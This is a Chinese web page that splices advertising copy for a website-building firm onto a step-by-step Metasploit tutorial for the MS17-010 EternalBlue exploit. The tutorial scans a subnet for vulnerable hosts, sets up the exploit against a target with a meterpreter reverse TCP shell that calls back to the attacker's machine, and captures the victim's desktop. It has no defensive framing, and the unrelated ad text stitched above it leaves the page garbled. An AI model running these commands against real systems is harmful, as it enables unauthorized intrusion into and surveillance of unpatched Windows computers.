重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
过程:
为雨山等地区用户提供了全套网页设计制作服务,及雨山网站建设行业解决方案。主营业务为网站建设、成都网站建设、雨山网站设计,以传统方式定制建设网站,并提供域名空间备案等一条龙服务,秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求,就会得到认可,从而选择与我们长期合作。这样,我们也可以走得更远!
1、扫描: 信息搜集(刺探)
2、漏洞利用
一、首先检测网段内存在漏洞的主机系统:
使用命令:
msf > use auxiliary/scanner/smb/smb_ms17_010 //加载扫描exp msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24 //配置扫描网段 msf auxiliary(scanner/smb/smb_ms17_010) > run //进行扫描
结果如下:
二、漏洞利用
msf利用命令如下:
msf > use exploit/windows/smb/ms17_010_eternalblue //加载***模块 msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25 //配置***目标IP RHOSTS => 192.168.22.25 msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146 //配置本机IP LHOST => 192.168.5.146 msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //配置回链方式 payload => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/ms17_010_eternalblue) >
查看当前配置的payload
msf exploit(windows/smb/ms17_010_eternalblue) > show options //查看配置选项 Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.22.25 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.5.146 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf exploit(windows/smb/ms17_010_eternalblue) >
发起***:
***命令: msf exploit(windows/smb/ms17_010_eternalblue) > exploit //发起***
获取对方电脑桌面:
meterpreter > screenshot Screenshot saved to: /root/RBDEvfGv.jpeg //可以到root目录下 查看对方电脑的截屏
获取shel权限
有关更多获取权限后的***技巧, 请自行百度 msf 后*** ***模块